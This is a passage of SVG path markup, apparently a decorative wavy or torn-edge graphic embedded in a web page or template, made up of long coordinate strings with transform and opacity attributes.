76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 